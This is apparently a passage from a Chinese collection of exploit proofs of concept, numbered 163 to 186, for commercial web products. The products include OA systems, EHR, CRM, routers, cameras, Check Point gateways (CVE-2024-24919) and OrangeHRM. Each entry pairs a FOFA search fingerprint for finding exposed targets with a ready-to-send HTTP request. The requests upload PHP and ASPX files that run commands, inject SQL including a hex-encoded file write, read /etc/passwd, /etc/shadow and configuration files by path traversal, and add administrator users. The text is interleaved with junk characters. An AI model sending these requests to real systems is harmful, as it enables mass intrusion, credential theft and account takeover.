( x" k6 S8 j6 vContent-Length: 583. x; B( Y) F% o" g0 k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey% k. H( n; k' L. K% D* L k$ H" B
Accept-Encoding: gzip
7 B; [" C; s' c# F/ i4 J& {* `
3 z9 z' R" y7 n+ E+ d4 S/ }------WebKitFormBoundaryeegvclmyurlotuey
( O, v* N, L1 j! f( M; c' dContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx". r- L D, r( a; u
Content-Type: application/octet-stream+ A2 q E6 V3 E4 K
) w0 r# @6 v2 \) S& y6 x<% response.write("ujidwqfuuqjalgkvrpqy") %>/ J/ x7 P: T- p$ _' V& l
------WebKitFormBoundaryeegvclmyurlotuey
) L/ G, b% }" DContent-Disposition: form-data; name="action"- A5 J" ?5 E: v9 X
g }) J4 s* ^, I* _6 i" S/ o6 k8 {: w
upload9 p3 X( S. V# W: Q+ t9 J9 u
------WebKitFormBoundaryeegvclmyurlotuey4 ~/ N8 f2 y! a$ Z* u# A$ E: S
Content-Disposition: form-data; name="responderId"8 G2 i. ^6 Y$ {% Z3 P' _
& k3 y4 Y7 }8 wResourceNewResponder
( \/ \- Z5 |% D. X, K------WebKitFormBoundaryeegvclmyurlotuey' k& v0 Y7 z- D# h6 d0 F
Content-Disposition: form-data; name="remotePath"
1 S" X( Q O: J) X' t; q/ Y1 r C! x& i& e) ]6 V5 O
/opt/resources
6 C. y8 E$ z! B0 z) g------WebKitFormBoundaryeegvclmyurlotuey--$ Q' P) g+ c! @6 I L L- R
9 {3 g! h- C9 a
3 z' Q5 c$ b5 @6 Q- Ihttp://x.x.x.x/opt/resources/kjuhitjgk.aspx- d4 g- I4 [5 g8 p% _
- r9 |0 Z; m9 K: U. n8 ?
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
0 r3 A& c4 ?* \7 O4 [+ m9 \FOFA: icon_hash="-795291075"
; ^2 o9 a3 q( o2 g$ d0 a0 sPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
% T1 _6 Y4 N h; hHost: x.x.x.x
6 B& x+ H2 g% ]" M( V& CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36, l9 N" G- L1 w4 Q' `0 Q1 k
Connection: close. H+ N) h+ w' @) Y
Content-Length: 2937 H$ Q% S: D1 w; ^, c# @
Accept: */*
3 y9 \/ @7 {& M) \5 C tAccept-Encoding: gzip, deflate/ q5 C/ @2 Y" z4 U" z; K- K
Accept-Language: zh-CN,zh;q=0.9; Y( }) u6 j. ` |6 e |) H) ?' b
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
( Z) X9 T: t$ d0 s* X4 x& f
+ e( c2 C& M5 w- u/ v1 q' |# s7 Q9 X------iiqvnofupvhdyrcoqyuujyetjvqgocod4 c% k% H7 }) `; A: O+ E/ x' \6 e* l
Content-Disposition: form-data; name="name"
8 `+ l2 ?* ^0 x0 r5 i
+ m. ]! [/ Y3 U1.php
4 t8 w& J6 ~2 d------iiqvnofupvhdyrcoqyuujyetjvqgocod3 e4 f7 ]; n3 S
Content-Disposition: form-data; name="upfile"; filename="1.php"* M6 n# P* p. l; B3 l
Content-Type: image/jpeg5 m3 @: c# c1 h& O
( w" a+ R h) Z# Q% G3 u- ~rvjhvbhwwuooyiioxega, u& E) t" c' a; ]
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
$ X0 P& `: V+ ?; C0 ^ H) Z! R9 z) M2 v" y+ p
0 J# z5 a/ W1 } s4 t3 l7 ^
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
9 H: T4 o& H4 S: X2 j2 jFOFA: title="智慧综合管理平台登入"# F& d- x( _" \& W+ V: n! h1 i6 l2 \
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
% K9 H* n, y G( hHost: x.x.x.x
: {1 e; k! |9 f8 O: _+ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.07 b7 s% L; x( m! ?# ~- K
Content-Length: 288, l+ F# g0 x/ H4 {$ m$ [' Z, S. p& p
Accept: application/json, text/javascript, */*; q=0.01
\& w! ~2 d, R7 Q) y9 K) h( v j! mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,& V) ~: P) m! _/ t6 @) }
Connection: close
0 c% ^3 d6 J% {! T4 M/ L2 J; lContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl6 T, u" V# U9 f
X-Requested-With: XMLHttpRequest
) R+ H. i% R k/ z, J% a3 x O7 gAccept-Encoding: gzip2 y/ v7 N; m/ K$ K9 E/ H+ r Q
' e8 T' F. |& d------dqdaieopnozbkapjacdbdthlvtlyl
9 Y, r3 z% g% u& ]& L2 mContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
+ P: h- v3 I. ?9 CContent-Type: image/jpeg4 _- P2 h7 @2 A' u. t6 f# y6 M
6 W' r8 k8 z' \7 ]! G3 [
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>0 q" E: j. A" D6 U
------dqdaieopnozbkapjacdbdthlvtlyl--
# O) ~1 \ Q* M1 p0 H
q, \; B! P* D% A
* M% r* s1 _& k2 t5 dhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx( R- o# \. K, R0 H. M; C
3 n- U7 L4 G& j$ K+ B) `
165. OrangeHRM 3.3.3 SQL 注入
% c5 ?- S4 I% k, o# w0 TCVE-2024-36428
% j( Z3 s0 y8 `FOFA: app="OrangeHRM-产品"
" \' R: g" R9 V- o. ], i- uURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))1 `4 A7 G# G% Y# i" V5 Q
3 t8 j, `$ E7 u8 C7 h6 Q
U' \3 S! F! Y8 Q8 J* J& T166. 中成科信票务管理平台SeatMapHandler SQL注入
, ~8 p! y4 Z" t9 L' t5 g6 hFOFA:body="技术支持:北京中成科信科技发展有限公司". N7 }+ D0 t) i* e
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
2 E$ @, m# \2 Q0 R4 jHost:
1 m5 e' {# @& YPragma: no-cache5 A' t' d+ H7 Z# K
Cache-Control: no-cache
8 g7 T2 R+ h1 j3 z3 DUpgrade-Insecure-Requests: 15 \. e. {6 [) G" \5 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.369 U4 F# h. r# r: y. l* F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ F! a( D+ z: R, P* D$ Z r' dAccept-Encoding: gzip, deflate
; J- M% T2 k+ NAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
/ V5 t# [/ A0 h3 I- F' U# FCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE" f9 _: |/ N, |5 l7 n( ^6 w! T
Connection: close L1 v7 Z. W9 m. x& X! i
Content-Type: application/x-www-form-urlencoded
$ i. S4 e2 B7 }2 g6 QContent-Length: 89; z4 \) k% E0 l0 _( o
& T' `2 l6 ~% [Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE: a$ r+ E3 ~+ B) T# u/ f
& k6 x3 F* [ u0 l0 `- r8 ^$ r
/ Z* ]: x4 c* Z! d3 N0 @, s167. 精益价值管理系统 DownLoad.aspx任意文件读取
* x, ], B8 N, MFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"# V+ P: s/ g. H/ f
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1$ U G$ V5 b* [" f7 q* H% y6 Z
Host:$ l1 e( t$ z% k) m' B& G- C! g' l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; |: L t6 Q4 Z/ S: [# Y$ A9 R
Content-Type: application/x-www-form-urlencoded! X! x3 F% o1 h0 [# U
Accept-Encoding: gzip, deflate# H# x/ m' a* r: c0 J
Accept: */*
" P; ^' S( T7 l$ Q4 x6 iConnection: keep-alive
7 S; v3 ~: y8 D8 v, q2 ?: w, _0 @6 O$ ]9 |! z+ j% e; ^
7 c3 ?( c9 q' u: s0 |. o2 b/ J" ?) @
168. 宏景EHR OutputCode 任意文件读取8 z0 M4 O5 Q% `& \6 l4 x; ~
FOFA:app="HJSOFT-HCM". P- w0 P) A+ ]0 Q$ E1 T R- L$ K
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1! o& A. O& c b
Host: your-ip/ I; S; ?- c$ D* e- X& Y) ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
, i( w+ U2 H9 Q# D" ZContent-Type: application/x-www-form-urlencoded0 @4 G1 Y9 C4 H8 b; m2 L) K! B8 [# _
Connection: close& i6 j( Z# J8 Z4 ?
j9 c% G) V; E
5 l* j* n+ }7 `# H' y% _3 `' R4 f
, ]% h F& e$ ?- r9 q169. 宏景EHR downlawbase SQL注入# W2 p( r: ?5 \5 H1 P9 w
FOFA:app="HJSOFT-HCM", Z' N& k- U! ]3 F q5 K
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1* G2 d, N+ o; b: d' \
Host: your-ip M0 M; i$ f6 Y# S4 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 j8 u6 M! P! e8 P! O7 WAccept: */*
5 H4 F- X: M& }% uAccept-Encoding: gzip, deflate
' p. D# f% c6 P: D% IConnection: close+ H/ h% Z1 c3 E6 N" t: n$ h5 x
! r) F" l3 r* S/ K2 T/ A
" ]4 s. ^# ~+ U# T0 h
, J. p' j! o( @8 u$ t+ j2 c8 F! q! q
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
" J! d7 H( p! {2 G1 T4 `( ?: ~FOFA:body="/general/sys/hjaxmanage.js"
8 p) A( {' A1 _4 p, e1 a V- e: jPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
8 s& Y1 i# `8 ]0 J2 ]4 E5 t$ dHost: balalanengliang
: z2 _* I( U% w4 U0 Q7 t$ f6 ~, \1 fUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 q2 {+ P2 Z7 V q& J4 [6 eContent-Type: application/x-www-form-urlencoded
- l+ n# j" R) r: _/ Z# F8 H6 b2 ?$ e5 u) E0 H8 U7 C" e
filename=../webapps/ROOT/WEB-INF/web.xml
9 ?8 |) X1 {- h& Y6 w; a6 E& F
. _2 Q2 {6 Y+ R) [5 |171. 通天星CMSV6车载定位监控平台 SQL注入
% K7 o# A" _4 B+ qFOFA:body="/808gps/"7 U6 C& }0 I1 S3 \
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
8 R' u$ X' r' e; s0 Y- b" P6 W- GHost: your-ip
; L& n0 r w7 t( {, |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0; p7 ^: m$ D. V8 S; o
Accept: */*5 }3 E1 @* r M( t o$ l: O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% d! Q) i# z( V$ t3 f
Accept-Encoding: gzip, deflate
& @# A# h( G' }6 W" vConnection: close
2 K# a2 o$ w" i4 r$ W1 b
S9 n4 {3 S3 J; _8 e! B# V% m) v1 F$ ~: ~: ~ G2 d
( C0 ~7 D/ i% |* u+ V( g, c
172. DT-高清车牌识别摄像机任意文件读取
$ b6 B4 s" s5 x" [" ~) u, t( CFOFA:app="DT-高清车牌识别摄像机"3 \% \$ L3 Z1 c% Z' u7 u
GET /../../../../etc/passwd HTTP/1.1
/ E, F7 P) K) z1 CHost: your-ip
) r* m+ z+ H' }* ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& r. n% j- k4 J1 P- Z X, _$ pAccept-Encoding: gzip, deflate2 d- i+ v6 x: N# }4 T
Accept: */*
# W4 H8 H7 b- l$ z1 _# VConnection: keep-alive- p9 A0 R. \& d r
( D$ B1 E b j9 g
6 H/ ~/ ^6 W3 n1 o7 k. J- J, M: z
0 ^+ s" L! y; ?7 e9 I Y
173. Check Point 安全网关任意文件读取
, c' c3 \6 C2 c4 F! rCVE-2024-24919( j% i2 v4 ]+ ?
FOFA:app="Check_Point-SSL-Network-Extender"
, i# `3 a0 e+ r/ {; D. X& yPOST /clients/MyCRL HTTP/1.1
6 N8 ?- {5 W7 V- q9 ]! hHost: your-ip
6 O6 S% l' T* O6 J# z! kContent-Type: application/x-www-form-urlencoded
2 Y% {3 ~7 }+ c$ q' l( Z2 ^/ A& C9 U+ [4 }# X2 ~% k
aCSHELL/../../../../../../../etc/shadow
( K9 k7 L0 ?, |6 D: r, m2 a; f5 Z' T' l' [- {9 @ q
9 F5 p3 D6 @- k0 Z* G: t2 R' k; ^
1 E. S2 i8 T' m& v. Z
174. 金和OA C6 FileDownLoad.aspx 任意文件读取! o( a3 y2 c; r6 X
FOFA:app="金和网络-金和OA"4 @& P) z' F p% q4 o: G% p
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1/ q+ e9 E. M1 W) p$ C' c
Host: your-ip
/ D0 Z3 `& F% j& HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. N/ I0 M9 J9 }( m0 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& a& R% |) M4 AAccept-Encoding: gzip, deflate, br
. _: X3 d& n: }% [* ?8 kAccept-Language: zh-CN,zh;q=0.9( M; s4 B6 y/ F: h
Connection: close1 B/ W, T7 P& _: J
+ X# h8 B) `% C5 R" |
4 F0 {1 Y6 [# L* L# l. C7 W8 A
3 j& y+ I- j4 f1 d0 L175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入) @0 L7 w2 F1 R& X4 p* e
FOFA:app="金和网络-金和OA"7 g- `* N+ ^' f* [, S# G
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
! R2 x) ]+ ?7 ` p0 J9 qHost:
* ?, I+ f6 ?, Q8 ]* X* g- nUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 c% ^' ~3 o- F% Y- K A( v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# p2 |# [& w* o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& \, [' p7 [$ @- R
Accept-Encoding: gzip, deflate
3 F& l5 R+ f1 v6 W4 u; r6 S( qConnection: close: \! N3 m- h+ L% {! o
Upgrade-Insecure-Requests: 1
+ r$ j9 Q% A3 p# u+ p/ O
* e( R% z2 m5 x. H7 y1 u# x+ F
# J+ [ d J* _176. 电信网关配置管理系统 rewrite.php 文件上传6 n6 I1 {% n$ d7 G
FOFA:body="img/login_bg3.png" && body="系统登录"
; I$ d. v+ n7 ]POST /manager/teletext/material/rewrite.php HTTP/1.1
% s8 K. R$ z5 O% e3 hHost: your-ip
) ~' [7 q8 D0 B3 g$ t) V9 P% yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0, H& U( z& k! x: s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT3 x- D! M& A9 r) W3 g* T- h
Connection: close
6 e& r d0 I3 q3 e1 r9 U0 K& i5 x1 z& {: Y
------WebKitFormBoundaryOKldnDPT5 b5 i* V2 ^% R) _1 j0 Y0 F
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
1 T$ [ e5 a6 p, GContent-Type: image/png
$ X! C1 d% T. u2 \: k: X' S) m& c
- s4 f8 _: M& Y<?php system("cat /etc/passwd");unlink(__FILE__);?>; S9 X; p5 z, U4 P9 f
------WebKitFormBoundaryOKldnDPT
' F6 X) E8 g ?) UContent-Disposition: form-data; name="uploadtime"! ]4 `+ [% q, n4 `+ C7 t
( R; Z" `9 }! j" |' V
, q% O: \4 A2 \2 p' H
------WebKitFormBoundaryOKldnDPT--8 Q% t+ X+ Q( p' L
X) G/ p: m# r4 B( M, @
- I5 C @/ {# ~8 s9 P5 _1 @0 [ j) F1 c7 m. n' _5 B- P
177. H3C路由器敏感信息泄露* L6 j* `* u3 ~4 H- s) [ |7 g5 [
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg* D! t1 S8 b, B( v9 a, Z& W% T
/userLogin.asp/../actionpolicy_status/../M60.cfg+ s$ D! N/ J* u" A ~. j& r
/userLogin.asp/../actionpolicy_status/../GR8300.cfg6 T2 Y9 o, `( B1 y) d+ C- i- }/ l3 V
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
- a7 r6 c0 p: Q) n. {/userLogin.asp/../actionpolicy_status/../GR3200.cfg
- J, w' M1 t* ?* _! y% d6 ?/userLogin.asp/../actionpolicy_status/../GR2200.cfg$ v/ x7 H( H4 Z+ [) ]
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
7 S3 p) @& {/ ?* H% G/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
6 r [, ?. {! M- S/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
* J. t, x# {5 R/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg' D% Z* L. @7 I" I) Y4 n- A
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
6 C6 F1 ]/ @: J/userLogin.asp/../actionpolicy_status/../ER5100.cfg
8 ?% `. o E+ e& Q, X7 o/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg( P7 v" G$ b2 M7 P, ?- \4 p1 M4 n
/userLogin.asp/../actionpolicy_status/../ER3260.cfg1 N! C' R/ s2 Y6 x7 f1 I# s/ h
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg9 l6 ]& k2 z; B
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
# w$ h* x0 H% @ x/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg2 r! Y+ |3 P3 j& h
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg; W5 x/ i7 ?3 F, L# t8 q/ y
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg# ]; ~, `+ V+ m, w2 Y/ K
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
" M3 Z: u$ W$ H$ K/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
, B" I, |9 G$ q7 `- H/ ` T" U# V S! M8 H
" K+ @ C0 v" D5 J8 c* c, s178. H3C校园网自助服务系统-flexfileupload-任意文件上传
. e2 z4 D& G- i5 S6 j& p% H9 z/ rFOFA:header="/selfservice"5 X9 l5 F, f5 B7 i
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
9 g8 @! E* i4 m2 }8 n7 j4 g( xHost:
3 x" H3 M6 n6 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; k+ A3 l: D J2 MContent-Length: 2521 ~ ?& V2 N* y$ S
Accept-Encoding: gzip, deflate% e) a* r! c6 m
Connection: close
9 I8 U- b* d$ q# w# j% ]Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l. h3 u6 V+ P+ q$ x& Q
-----------------aqutkea7vvanpqy3rh2l9 x0 y+ }% M1 F# v5 I& Q
Content-Disposition: form-data; name="12234.txt"; filename="12234"5 x7 N1 Q% ?1 J$ a" o! ]7 t
Content-Type: application/octet-stream. ~6 o& G+ r# ?( R! J
Content-Length: 255) Y" y7 e' v8 `2 y' q, x4 p. K6 F0 j
5 H/ l0 ?1 }5 `8 P* c! z: Z( c# {" R
12234
% E, I5 }" \# Z# X8 G-----------------aqutkea7vvanpqy3rh2l--
; X) B6 ^6 n" ^4 }' A/ y' ~0 o* d: Y% z
# W; C( O! O/ C0 A# B' @
GET /imc/primepush/%2e%2e/flex/12234.txt
8 ]7 d9 T. V1 v" h% K# }- a f4 [& J! h4 N# @2 t
0 g/ u# l7 ]" n3 e% ~179. 建文工程管理系统存在任意文件读取9 K9 T. w4 m1 j$ ]4 R( R* H2 u
POST /Common/DownLoad2.aspx HTTP/1.18 g" G9 w: l" `$ F& E: i4 J
Host: {{Hostname}}
( J* j5 z+ V/ m- bContent-Type: application/x-www-form-urlencoded; x2 [' n6 z5 I6 u& E; Y( E
User-Agent: Mozilla/5.07 _8 @, x2 r/ H& |# P6 j' s& l
2 A$ `4 F# F/ U2 o% z- d( C8 qpath=../log4net.config&Name=- e0 u: _" _1 h" u# F
$ @3 u6 m* a+ d# O' A$ s! j' u6 J( H+ }$ q) v' h3 w
180. 帮管客 CRM jiliyu SQL注入9 z& X6 q/ C) a" `
FOFA:app="帮管客-CRM"! v; r5 l. d3 a! u% I
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1& H |9 R) I' T( J& `$ {
Host: your-ip( g6 c1 j2 x2 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ k ?& c* A9 q$ J) S& d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! o2 d' t! n! eAccept-Encoding: gzip, deflate
# {, g- V& }- S( eAccept-Language: zh-CN,zh;q=0.96 h6 a! m: i$ ]& A i0 B1 [
Connection: close- k" k! a3 e" y
; d( w5 ~% }: @
9 O$ ?0 D, l- _! T/ s
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入* e( ` [1 i8 f( B, F- f: c4 K
FOFA:"PDCA/js/_publicCom.js"
4 q- ?1 g. @9 VPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
8 z% m& d& k; S6 i/ x3 FHost: your-ip6 j9 b9 F2 r* Z3 a7 q- C2 i* U) K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36/ ~3 b- n5 {4 \, ?3 V" v! s4 Q" W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, S% V. z% [, k- tAccept-Encoding: gzip, deflate, br" @% p& S" V" U
Accept-Language: zh-CN,zh;q=0.91 E2 i( v9 V; j- L5 H
Connection: close
+ i) Y% I3 @# Z4 P2 J8 q: A: fContent-Type: application/x-www-form-urlencoded! \& F& H. X: m. V0 k% j' {- O; t
% O& L/ T( f$ O' U, w
1 c% c$ G" L( ?' \/ G% ^2 U1 Aaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=208 j3 g" t X% l$ [5 A
8 d* E1 _+ G9 H% _# a; U3 v$ t8 }6 L( f, O7 W* r# h( ^$ |; c6 c
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
' j2 \: c3 b5 d n2 lFOFA:"PDCA/js/_publicCom.js"
T4 |: X. e1 j. l% JPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1' k/ U7 z: \7 W/ |2 i
Host: your-ip
, c0 Q9 T5 J0 B9 T: ?5 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36+ ?0 D: V E9 i0 m) ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' q; |& s0 A4 K0 Q7 o7 q1 y8 W0 s BAccept-Encoding: gzip, deflate, br1 l! a$ O+ I$ C5 |, q
Accept-Language: zh-CN,zh;q=0.98 `6 y, c6 w T, Q, E
Connection: close
4 a- Q- U, r) B- A2 {. {- CContent-Type: application/x-www-form-urlencoded7 z- [' U, n# g+ l& z- D; `8 W
- }# T" J9 R6 F: [9 X9 X" L
: y$ K- @+ L4 Q8 r$ D. }username=test1234&pwd=test1234&savedays=1
% k, x1 Q3 M5 ^, k( `' ~- u. A U+ c" g- W+ t J) _
2 J6 J' Y* z0 C3 [. d183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
: d- u, P3 R1 r# w1 R jFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
. Z. F6 d' N2 T. z/ h2 V8 tGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
# p" F/ V, G, |$ r5 P$ \Host: your-ip B( x, [/ @' @: ^
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( y# s z \& B0 Q ~Accept-Charset: utf-8. q/ E1 P1 x# f. L/ l
Accept-Encoding: gzip, deflate5 F6 b5 A2 d* U: F
Connection: close
# p1 J3 O- U9 M* {4 e
: p$ A% z( m/ P# f+ b
5 P" S6 ]& w! }8 b184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加) a" T9 u% U3 X* H8 ]7 ]! B
FOFA:server="SunFull-Webs"
% v1 J6 u* p: @POST /soap/AddUser HTTP/1.1
* h3 j% R1 m7 wHost: your-ip
5 V! u5 V* C/ v+ Z: x; y$ J6 f- o4 y9 ^. TAccept-Encoding: gzip, deflate
+ Z/ v& O7 j/ R- m( |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0+ ]3 a, m- ~5 x
Accept: application/xml, text/xml, */*; q=0.01; {4 k$ ~2 p: A$ A V% P5 F
Content-Type: text/xml; charset=utf-8
. ?) V# e9 K) u. T7 _0 hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 f; V5 B- w& e- Z g o9 c
X-Requested-With: XMLHttpRequest
* H. G" w- s: E) r
8 a4 O% F# Y. ?0 a' S: f8 z1 E4 K. N7 ^9 v
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
* A6 W+ I P, Q2 B
5 ?- f C: Y+ V- }5 t
1 _( a/ q: Y4 h: S185. 瑞友天翼应用虚拟化系统SQL注入
0 x/ m, G& f' kversion < 7.0.5.1
# q" r5 E& Z- e) @6 FFOFA:app="REALOR-天翼应用虚拟化系统"
2 r4 H ]5 C L8 u: uGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
6 D5 I( {. J3 ~! {7 H5 M1 F! h) b& n- } YHost: host1 y" {. q: k% j* N& K n# {+ Z+ B
2 ?- ~4 m9 z0 p
6 a i) }$ U& ~5 T- Q. ~186. F-logic DataCube3 SQL注入
# O6 I* B% [+ x" Y. J& f, dCVE-2024-31750* Q( B, P% A, _$ y3 [) o+ R
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统* ~/ j; d7 W2 I2 O& V; ?
FOFA:title=="DataCube3"# S, M1 m! I: l0 k5 I3 S# a: f
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1! Z4 ~* ]- m: v
Host: your-ip
8 ~% T$ I1 ^6 h5 Z) xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.04 O# {3 e9 z4 P2 q. s7 u- x2 d
